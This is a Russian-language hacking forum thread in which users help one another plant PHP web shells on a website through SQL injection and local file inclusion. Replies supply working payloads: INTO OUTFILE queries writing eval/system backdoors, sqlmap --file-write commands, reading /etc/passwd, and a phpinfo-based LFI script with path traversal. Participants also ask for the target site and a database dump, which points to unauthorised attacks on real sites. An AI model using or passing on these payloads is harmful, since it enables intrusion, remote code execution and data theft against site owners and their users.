Помогите с заливкой шелла.

Добрый день.
Есть сайт с ошибкой
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in var\www\core\mods\groups\deletegroup.php on line 20
Как залить шелл, есть пути и file priv Y ?
CURRENT USER -ROOT

 

Основные способы:
1) Использовать юзер-функции
2) INTO [DUMPFILE|OUTFILE]

 

PHP:

select '<?php eval(base64_decode($_REQUEST[cmd])); ?>' into outfile 'полный путь к папкам/shell.php'

 

Ты сайт выложи сюда

 

Вообщем смог раскрутить через sqlmap, есть доступ к базе, насчет прав - пишет root@localhost. права на чтение и запись есть.функция load_file работает, получилось получить файл "/etc/passwd
Ну вот пытаюсь залить через sqlmap командой --file-write="C:\путь\тут php файл <?php eval($_GET[cmd]); ?>" --file-dest="путь"
выдает мне такое

 

на папке прав на запись в папке, ищи другую

 

Да вот странно имею такие привилегии
А залить даже в temp не могу

 

какие такие? у тебя рут права только в майскул, в фс они отношения не имеют

 

может знаний не хватает? раз софтом пытаешься шелл залить..

хватит флудить, есть статья от нолика, начни оттуда,а эта тема обсуждалась тут со времен динозавров.

 

ТС, можешь сделать дамп БД?
И что за сайт то?

 

база на том же сервере? файлы читать можешь? Прочитай хотябы тот файл где ошибку показывает. Ну или конфиг апач\нжнкс \ етк посомтри, или hosts

Если все ок, ищи диру под запись.

 

Файлы читаются. Файл с ошибкой читается.

 

--file-write="C:\путь\тут php файл <?php eval($_GET[cmd]); ?>"
Что за путь здесь нужно указывать?


--file-dest="путь" здесь я так понял путь к файлам сайта

 

Ручками залей уже

vuln=1 limit 1 into outfile '/PathToShell/filename.php' lines terminated by "<?php system($_GET[c]);?>"--+
или
vuln=1 limit 1 into outfile ''/PathToShell/filename.php' fields terminated by '' optionally enclosed by "<?php system($_GET[c]);die();?>"--+​

2 Sat-hacker
вобщемта тут и понимать нечего -hh опция все покажет.

--file-write=WFILE Write a local file on the back-end DBMS file system
--file-dest=DFILE Back-end DBMS absolute filepath to write to

 

решил попробовать заюзать lfi найденный не так давно на неком сайте
оказалось что картинки подгрузить нельзя а другими путями я ниразу не ходил
есть доступ к phpinfo и php.ini
подскажите хороший мануал =(

 

Классика https://rdot.org/forum/showthread.php?t=1134&highlight=phpinfo

 

заюзал скрипт и при инклуде у меня пустая страничка


perl lfi.pl httр//site.com/i.php httр://www.site.com/index.php?page=../../../../../../../../../../../../../../etc/passwd%00

как только скрипт выполняется я копирую имя файла tmp/******
и инклужу
http://www.site.com/index.php?page=../../../../../../../../../../../../../../tmp/******%00

что может быть не так?? в скрипте ничего менять не надо??

 

Я это читал но не могу вкурить,обьясните если можна

 

В sqlmap --file-write="C:\shell.php" sqlmap берет шелл куда ты его положил на своем жд, --file-dest="/var/www/html/site.com" это куда sqlmap будет копировать файл шелла на сервере, при условии что есть права на запись файла.
К примеру так.
python sqlmap.py -u "http://dcsdcsdcds.com/index.php?id=12
--random-agent --file-write="C:\sqlmap\shell.php" --file-dest="var/www/html/dcsdcsdcds.com/images/"

 

товарищи, кто нибудь использует сокращение команд? -z. Удобно же.